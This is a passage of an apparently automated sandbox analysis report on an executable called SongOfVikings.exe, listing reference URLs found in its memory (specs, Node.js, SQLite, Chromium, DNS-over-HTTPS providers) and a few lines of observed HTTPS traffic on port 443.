Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/webappapis.html#windoworworkerglobalscope
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://infra.spec.whatwg.org/#forgiving-base64
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://infra.spec.whatwg.org/#forgiving-base64-decode
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://invisible-island.net/ncurses/terminfo.ti.html#toc-_Specials
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/161903006
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/166809097
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/184850002
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/187425444
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903emulatePixelLocalStorageEmulate
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/229267970
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/253522366
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://linux.die.net/man/1/dircolors).
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://lists.gnu.org/archive/html/automake/2012-07/msg00001.html
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://lists.gnu.org/archive/html/automake/2012-07/msg00014.html
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://nextdns.io/privacy
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://no-color.org/
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode).
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/api/fs.html
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/api/fs.html#fs_stat_time_values)
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/api/http.html#http_class_http_incomingmessage
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://odvr.nic.cz/doh
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://odvr.nic.cz/dohodvr.nic.cz185.43.135.1193.17.47.12001:148f:fffe::12001:148f:ffff::1
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://openjsf.org/
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pagure.io/lohit
Source: SongOfVikings.exe, 00000000.00000003.1904090510.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1907083686.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1903191671.0000000002D71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://passwords.google.com
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://perfetto.dev/docs/contributing/getting-started#community).
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://perfetto.dev/docs/contributing/getting-started#community).No
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/billing
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/billingQuota
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://public.dns.iij.jp/
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://public.dns.iij.jp/IIJ
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://public.dns.iij.jp/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://public.dns.iij.jp/dns-queryIijUShttps://nextdns.io/privacyNextDNShttps://chromium.dns.nextdn
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html).
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://semver.org/
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sindresorhus.com
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sindresorhus.com)
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/site/gaviotachessengine/Home/endgame-tablebases-1
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://source.chromium.org/chromium/chromium/src/
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sourceforge.net/projects/wtl/files/WTL%2010/
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sourcemaps.info/spec.html
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sqlite.org/
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sqlite.org/cli.html
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sqlite.org/fiddle
Source: SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sqlite.org/forum/forumpost/206d99a16dd9212f
Source: SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sqlite.org/forum/forumpost/51e6959f61
Source: SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sqlite.org/forum/forumpost/68d284c86b082c3e
Source: SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sqlite.org/forum/forumpost/726219164b
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sqlite.org/forum/forumpost/d7be961c5c
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/a/5501711/3561
Source: SongOfVikings.exe, 00000000.00000003.1903282171.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904742108.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904838048.0000000006527000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1903858433.0000000006525000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904442973.0000000006525000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1905568619.0000000006527000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904090510.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904504634.0000000006527000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1905115227.0000000006525000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1903826229.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1905469173.0000000006527000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1903222997.0000000006526000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904971935.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1905428858.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904188801.0000000006527000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1907083686.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1903191671.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904779264.0000000006527000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1905180838.0000000006527000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904330720.0000000002D71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/a/answer/9122284
Source: SongOfVikings.exe, 00000000.00000003.1903282171.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904742108.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904838048.0000000006527000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1903858433.0000000006525000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904442973.0000000006525000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1905568619.0000000006527000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904090510.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904504634.0000000006527000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1905010134.0000000006525000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1905115227.0000000006525000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1903826229.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1905469173.0000000006527000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1903222997.0000000006526000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904971935.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904126521.0000000006527000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1905428858.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904188801.0000000006527000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1907083686.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1903191671.0000000002D71000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1904779264.0000000006527000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1905180838.0000000006527000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6098869
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swiftshader.googlesource.com/SwiftShader
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tc39.es/ecma262/#sec-%typedarray%-intrinsic-object
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tc39.es/ecma262/#sec-proxy-object-internal-methods-and-internal-slots-defineownproperty-p-de
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tc39.es/ecma262/#sec-proxy-object-internal-methods-and-internal-slots-getownproperty-p
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tc39.es/ecma262/#sec-proxy-object-internal-methods-and-internal-slots-getprototypeof
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tc39.es/ecma262/#sec-proxy-object-internal-methods-and-internal-slots-ownpropertykeys
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tc39.es/ecma262/#sec-timeclip
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tc39.es/ecma262/#table-typeof-operator-results
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tc39.github.io/ecma262/#sec-%iteratorprototype%-object
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tc39.github.io/ecma262/#sec-%typedarray%.of
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tc39.github.io/ecma262/#sec-object.prototype.tostring
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://testanything.org/tap-version-14-specification.html
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://testanything.org/tap-version-14-specification.html#subtests
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2152
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2397#section-2
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc3492#section-3.4
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc3986#section-3.2.2
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc5234#appendix-B.1
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc6455#section-1.3
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc6838#section-3.1
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.2
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.6
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7540#section-8.1.2.5
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#cannot-have-a-username-password-port
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#concept-url
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#concept-url-origin
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-byte-serializer
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-parser
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-serializer
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#forbidden-host-code-point
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#special-scheme
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#url
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#url-serializing
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams-stringification-behavior
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://v8.dev/blog/v8-release-89
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/manifest/#installability-signals
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/resource-timing/#dfn-mark-resource-timing
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/resource-timing/#dfn-setup-the-resource-timing-entry
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/resource-timing/#dom-performance-setresourcetimingbuffersize
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#grammardef-option-expression
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#integrity-metadata-description
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#parse-metadata
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#the-integrity-attribute
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://webassembly.github.io/spec/web-api
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://webidl.spec.whatwg.org/#es-dictionary
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://webrtc.googlesource.com/src/
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3F
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bluetooth.com/specifications/gatt/characteristics
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bluetooth.com/specifications/gatt/descriptors
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bluetooth.com/specifications/gatt/services
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.chromestatus.com/feature/5644273861001216.
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.chromestatus.com/feature/5682658461876224.
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.chromestatus.com/feature/5718547946799104
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://www.cisco.com/c/en/us/about/legal/privacy-full.html
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-line-terminators
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-promise.all
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/5.1/#sec-15.1.3.4
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.gnu.org/licenses/
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.gnu.org/software
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.gnu.org/software/automake/
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.gnu.org/software/coreutils/
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.iana.org/assignments/tls-extensiontype-values
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://www.nic.cz/odvr/
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://www.nic.cz/odvr/CZ.NIC
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.perl.org/
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://www.quad9.net/home/privacy/
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://www.quad9.net/home/privacy/Quad9
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.rfc-editor.org/rfc/rfc9110#section-5.2
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.sqlite.org/src/info/fac496b61722daf2
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.swift.org/download/
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.unicode.org/copyright.html.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
